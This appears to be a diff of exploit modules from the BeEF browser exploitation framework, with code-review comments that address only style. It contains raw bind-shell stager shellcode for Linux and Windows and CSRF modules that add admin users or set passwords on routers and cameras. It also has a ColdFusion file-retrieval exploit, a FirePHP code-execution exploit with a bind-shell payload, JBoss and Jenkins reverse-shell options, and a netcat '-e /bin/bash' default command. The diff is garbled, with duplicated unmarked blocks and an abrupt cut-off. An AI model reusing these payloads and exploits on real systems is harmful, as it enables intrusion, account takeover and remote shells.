include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 47, 'n' ] },
'Payload' =>
"\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" +
"\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" +
"\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" +
"\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" +
"\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" +
"\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
}
))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [47, 'n'] },
'Payload' =>
"\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" \
"\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" \
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" \
"\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" \
"\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" \
"\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" \
"\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" \
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" \
"\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" \
"\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
}))
end
end


@@ -9,54 +9,49 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module MetasploitModule
include Msf::Payload::Stager
include Msf::Payload::Windows
include Msf::Payload::Stager
include Msf::Payload::Windows
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Version' => '$Revision: 9179 $',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Ty Miller'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 200, 'n' ] },
'Payload' =>
# Length: 299 bytes
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" +
"\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" +
"\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" +
"\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" +
"\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
}
))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Version' => '$Revision: 9179 $',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Ty Miller'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [200, 'n'] },
'Payload' =>
# Length: 299 bytes
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" \
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" \
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" \
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" \
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" \
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" \
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" \
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" \
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" \
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" \
"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" \
"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" \
"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" \
"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" \
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" \
"\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" \
"\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" \
"\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" \
"\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
}))
end
end


@@ -4,18 +4,16 @@
# See the file 'doc/COPYING' for copying permission
#
class Boastmachine_add_user_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog' },
{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username' },
{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password' },
{ 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com' }
]
end
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog'},
{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
{ 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end
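Review bot: `post_execute` stores `@datastore['result']` unconditionally, so a run that returns nothing is saved as `{ 'result' => nil }`, while Extract_cmd_exec and Groovyshell_server_command_execution in this same commit guard the call. For consistency the line could read `save({ 'result' => @datastore['result'] }) unless @datastore['result'].nil?`. The same unguarded form appears in the Airlive, D-Link DCS, Linksys WVC, ColdFusion and Farsite modules below. How `save` treats a nil value is not visible in this diff, so this may turn out to be cosmetic.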


@@ -4,17 +4,15 @@
# See the file 'doc/COPYING' for copying permission
#
class Airlive_add_user_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef'},
{'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/' },
{ 'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef' },
{ 'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__' }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end


@@ -4,16 +4,14 @@
# See the file 'doc/COPYING' for copying permission
#
class Dlink_dcs_series_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Camera web root', 'value' => 'http://192.168.0.1/'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
[
{ 'name' => 'base', 'ui_label' => 'Camera web root', 'value' => 'http://192.168.0.1/' },
{ 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end


@@ -4,16 +4,14 @@
# See the file 'doc/COPYING' for copying permission
#
class Linksys_wvc_wireless_camera_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.101/'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.101/' },
{ 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end


@@ -4,23 +4,19 @@
# See the file 'doc/COPYING' for copying permission
#
class Coldfusion_dir_traversal_exploit < BeEF::Core::Command
def self.options
return [
{'name' => 'fileToRetrieve', 'ui_label' => 'Retrieve file (in CF /lib dir)', 'value' => 'password.properties'},
{ 'name' => 'os_combobox', 'type' => 'combobox', 'ui_label' => 'CF server OS', 'store_type' => 'arraystore',
'store_fields' => ['os'], 'store_data' => [['Windows'],['Linux/MacOSX/*BSD']],
'valueField' => 'os', 'displayField' => 'os', 'mode' => 'local', 'autoWidth' => true
},
{ 'name' => 'cf_version', 'type' => 'combobox', 'ui_label' => 'ColdFusion version', 'store_type' => 'arraystore',
'store_fields' => ['cf_version'], 'store_data' => [['8'],['9']],
'valueField' => 'cf_version', 'displayField' => 'cf_version', 'mode' => 'local', 'autoWidth' => true
}
[
{ 'name' => 'fileToRetrieve', 'ui_label' => 'Retrieve file (in CF /lib dir)', 'value' => 'password.properties' },
{ 'name' => 'os_combobox', 'type' => 'combobox', 'ui_label' => 'CF server OS', 'store_type' => 'arraystore',
'store_fields' => ['os'], 'store_data' => [['Windows'], ['Linux/MacOSX/*BSD']],
'valueField' => 'os', 'displayField' => 'os', 'mode' => 'local', 'autoWidth' => true },
{ 'name' => 'cf_version', 'type' => 'combobox', 'ui_label' => 'ColdFusion version', 'store_type' => 'arraystore',
'store_fields' => ['cf_version'], 'store_data' => [['8'], ['9']],
'valueField' => 'cf_version', 'displayField' => 'cf_version', 'mode' => 'local', 'autoWidth' => true }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end


@@ -12,19 +12,18 @@
# Source: http://sourceforge.net/projects/extract/
###
class Extract_cmd_exec < BeEF::Core::Command
def self.options
return [
{'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '10100'},
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
{'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '10100' },
{ 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15' },
{ 'name' => 'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type' => 'textarea',
'value' => '{netcat,-l,-p,1337,-e,/bin/bash}', 'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
save({ 'result' => @datastore['result'] }) unless @datastore['result'].nil?
save({ 'fail' => @datastore['fail'] }) unless @datastore['fail'].nil?
end
end


@@ -1,23 +1,18 @@
#
class Farsite_x25_remote_shell < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.beef_host
return [
[
{ 'name' => 'scheme', 'type' => 'combobox', 'ui_label' => 'HTTP(s)', 'store_type' => 'arraystore',
'store_fields' => ['http'], 'store_data' => [['HTTP'],['HTTPS']],
'valueField' => 'http', 'displayField' => 'http', 'mode' => 'local', 'autoWidth' => true
},
'store_fields' => ['http'], 'store_data' => [['HTTP'], ['HTTPS']],
'valueField' => 'http', 'displayField' => 'http', 'mode' => 'local', 'autoWidth' => true },
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '10.0.0.1' },
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => "#{beef_host}" },
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' }
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => beef_host.to_s },
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end
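Review bot: `self.options` assigns `@configuration`, which inside a class method is an instance variable on the class object and outlives the call, although it is only read on the following line. A local is enough here: `beef_host = BeEF::Core::Configuration.instance.beef_host`. With the new `beef_host.to_s`, a nil host silently becomes an empty 'Local Host' default; whether `beef_host` can be nil is not visible in this hunk.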


@@ -6,14 +6,13 @@
# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
###
class Firephp_code_exec < BeEF::Core::Command
def pre_send
rand_str = rand(32**10).to_s(32)
# load payload.js file
# generate payload:
# msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
payload = ""
payload = ''
f = File.open("#{$root_dir}/modules/exploits/firephp/payload.js")
f.each_line do |line|
payload << line
@@ -22,16 +21,16 @@ class Firephp_code_exec < BeEF::Core::Command
# construct exploit+payload HTTP response
exploit = {
"RequestHeaders" => {
"1"=>"#{rand(10)}",
"2"=>"#{rand(10)}",
"3"=>"#{rand(10)}",
"4"=>"#{rand(10)}",
"5"=>"#{rand(10)}",
"6"=>"#{rand(10)}",
"7"=>"#{rand(10)}",
"8"=>"#{rand(10)}",
"9"=>"#{rand(10)}",
'RequestHeaders' => {
'1' => rand(10).to_s,
'2' => rand(10).to_s,
'3' => rand(10).to_s,
'4' => rand(10).to_s,
'5' => rand(10).to_s,
'6' => rand(10).to_s,
'7' => rand(10).to_s,
'8' => rand(10).to_s,
'9' => rand(10).to_s,
"<script>#{payload}<\/SCRIPT>" => rand_str
}
}.to_json
@@ -39,21 +38,19 @@ class Firephp_code_exec < BeEF::Core::Command
# mount exploit+payload at /firephp
# @todo use Router class instead of bind_raw()
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
{
'Content-Type' => 'text/html',
'X-Wf-Protocol-1' => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
'X-Wf-1-Plugin-1' => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
'X-Wf-1-1-1-1' => "#{exploit.length}|#{exploit}|\r\n"
},
rand_str, # HTTP body
'/firephp', # URI mount point
-1
)
{
'Content-Type' => 'text/html',
'X-Wf-Protocol-1' => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
'X-Wf-1-Plugin-1' => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
'X-Wf-1-1-1-1' => "#{exploit.length}|#{exploit}|\r\n"
},
rand_str, # HTTP body
'/firephp', # URI mount point
-1)
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end
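Review bot: In `pre_send`, `File.open(...)` is called without a block, so the handle is not released if `each_line` raises. The two lines between the first and second hunk are not shown, so an explicit `f.close` there cannot be ruled out. `payload = File.read("#{$root_dir}/modules/exploits/firephp/payload.js")` replaces the open/`each_line`/`<<` sequence and closes the file on every path. It also removes the in-place append to `payload = ''`, which would raise `FrozenError` if this file ever gains `# frozen_string_literal: true`.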

File diff suppressed because one or more lines are too long


@@ -4,19 +4,18 @@
# See the file 'doc/COPYING' for copying permission
#
class Groovyshell_server_command_execution < BeEF::Core::Command
def self.options
return [
{'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '6789'},
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
{'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width'=>'200px' },
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '6789' },
{ 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15' },
{ 'name' => 'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type' => 'textarea',
'value' => '/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
save({ 'result' => @datastore['result'] }) unless @datastore['result'].nil?
save({ 'fail' => @datastore['fail'] }) unless @datastore['fail'].nil?
end
end

View File

@@ -5,27 +5,23 @@
#
class Hp_ucmdb_add_user_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
'store_fields' => ['protocol'], 'store_data' => [['http'],['https']],
'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true
},
{'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
{'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'},
{ 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']],
'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true
},
{'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'},
{'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
[
{ 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
'store_fields' => ['protocol'], 'store_data' => [['http'], ['https']],
'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true },
{ 'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1' },
{ 'name' => 'port', 'ui_label' => 'Port', 'value' => '8080' },
{ 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
'store_fields' => ['usertype'], 'store_data' => [['createUser'], ['createIntegrationUser']],
'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true },
{ 'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1' },
{ 'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF' },
{ 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end


@@ -4,24 +4,21 @@
# See the file 'doc/COPYING' for copying permission
#
class Jboss_jmx_upload_exploit < BeEF::Core::Command
def self.options
return [
{'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'},
{'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'},
{'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1'},
{'name' => 'lport', 'ui_label' => 'MSF Listener Port (or bind)', 'value' => '6666'},
{'name' => 'injectedCommand', 'ui_label' => 'Command to execute', 'value' => 'cmd.exe'},
{'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' => rand(32**20).to_s(32)},
{ 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
'store_fields' => ['payload'], 'store_data' => [['reverse'],['bind']],
'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
}
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080' },
{ 'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1' },
{ 'name' => 'lport', 'ui_label' => 'MSF Listener Port (or bind)', 'value' => '6666' },
{ 'name' => 'injectedCommand', 'ui_label' => 'Command to execute', 'value' => 'cmd.exe' },
{ 'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' => rand(32**20).to_s(32) },
{ 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
'store_fields' => ['payload'], 'store_data' => [['reverse'], ['bind']],
'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end


@@ -4,12 +4,11 @@
# See the file 'doc/COPYING' for copying permission
#
class Jenkins_groovy_code_exec < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
lhost = '' if lhost == '0.0.0.0'
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '80' },
{ 'name' => 'uri', 'ui_label' => 'Target URI', 'value' => '/jenkins/' },
@@ -18,34 +17,31 @@ class Jenkins_groovy_code_exec < BeEF::Core::Command
'ui_label' => 'Target Protocol',
'store_type' => 'arraystore',
'store_fields' => ['rproto'],
'store_data' => [ ['http'], ['https'] ],
'store_data' => [['http'], ['https']],
'emptyText' => 'Select a protocol (HTTP/HTTPS)',
'valueField' => 'rproto',
'displayField' => 'rproto',
'mode' => 'local',
'forceSelection' => 'true',
'autoWidth' => true
},
'autoWidth' => true },
{ 'name' => 'payload',
'type' => 'combobox',
'ui_label' => 'Payload',
'store_type' => 'arraystore',
'store_fields' => ['payload'],
'store_data' => [ ['reverse_bash'], ['reverse_netcat'], ['reverse_python'] ],
'store_data' => [['reverse_bash'], ['reverse_netcat'], ['reverse_python']],
'emptyText' => 'Select a payload',
'valueField' => 'payload',
'displayField' => 'payload',
'mode' => 'local',
'forceSelection' => 'false',
'autoWidth' => true
},
'autoWidth' => true },
{ 'name' => 'lhost', 'ui_label' => 'Listen Host', 'value' => lhost },
{ 'name' => 'lport', 'ui_label' => 'Listen Port', 'value' => '8080' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end
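Review bot: `'forceSelection' => 'true'` on the `rproto` combobox and `'forceSelection' => 'false'` on the `payload` combobox are strings, while `'autoWidth' => true` in the same hashes is a real boolean. If these values reach the UI layer unchanged, the non-empty string `'false'` would be truthy there and the payload box would behave the opposite way from what is written; the serialisation code is not visible here, so treat that as likely rather than certain. I would use booleans in both places, `'forceSelection' => true` and `'forceSelection' => false`. The options array opens in the first hunk of this section and continues through the second.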


@@ -4,19 +4,17 @@
# See the file 'doc/COPYING' for copying permission
#
class Kemp_command_execution < BeEF::Core::Command
def self.options
return [
{'name'=>'rhost', 'ui_label' => 'URL', 'value' => 'https://x.x.x.x'},
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '443'},
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
{'name'=>'cmd', 'ui_label' => 'Command', 'description' => 'Enter shell command to execute.', 'type'=>'textarea', 'value'=>"ls", 'width'=>'200px' },
[
{ 'name' => 'rhost', 'ui_label' => 'URL', 'value' => 'https://x.x.x.x' },
{ 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '443' },
{ 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15' },
{ 'name' => 'cmd', 'ui_label' => 'Command', 'description' => 'Enter shell command to execute.', 'type' => 'textarea', 'value' => 'ls', 'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
save({ 'result' => @datastore['result'] }) unless @datastore['result'].nil?
save({ 'fail' => @datastore['fail'] }) unless @datastore['fail'].nil?
end
end
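Review bot: The option named `rhost` is labelled `URL` and defaults to `https://x.x.x.x`, a scheme plus host, while a separate `rport` option defaults to `443`. Other modules in this commit use `rhost` for a bare host (`127.0.0.1`), so a reader cannot tell from `self.options` whether the port is appended to the URL or ignored when the URL already carries one. Renaming the key would break the module's JavaScript side, so I would only document it, e.g. `# rhost holds scheme + host (no port, no trailing slash); rport is appended by the client-side code`, once that is confirmed against the part of the module not shown here.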


@@ -4,15 +4,13 @@
# See the file 'doc/COPYING' for copying permission
#
class Activex_command_execution < BeEF::Core::Command
def self.options
[
{ 'name' => 'cmd', 'ui_label' => 'Command', 'type' => 'textarea', 'value' => 'cmd.exe /c "echo Hello from BeEF! & pause"', 'width' => '400px', 'height' => '50px' }
]
end
def self.options
return [
{'name' => 'cmd', 'ui_label'=>'Command', 'type' => 'textarea', 'value' =>'cmd.exe /c "echo Hello from BeEF! & pause"', 'width' => '400px', 'height' => '50px'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end


@@ -9,16 +9,14 @@
# See: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_004_midi.rb
###
class Ie_ms12_004_midi < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/ie_ms12_004_midi/ie_ms12_004_midi.html', '/ie_ms12_004_midi', 'html')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/ie_ms12_004_midi/ie_ms12_004_midi.mid', '/ie_ms12_004_midi', 'mid')
end
def post_execute
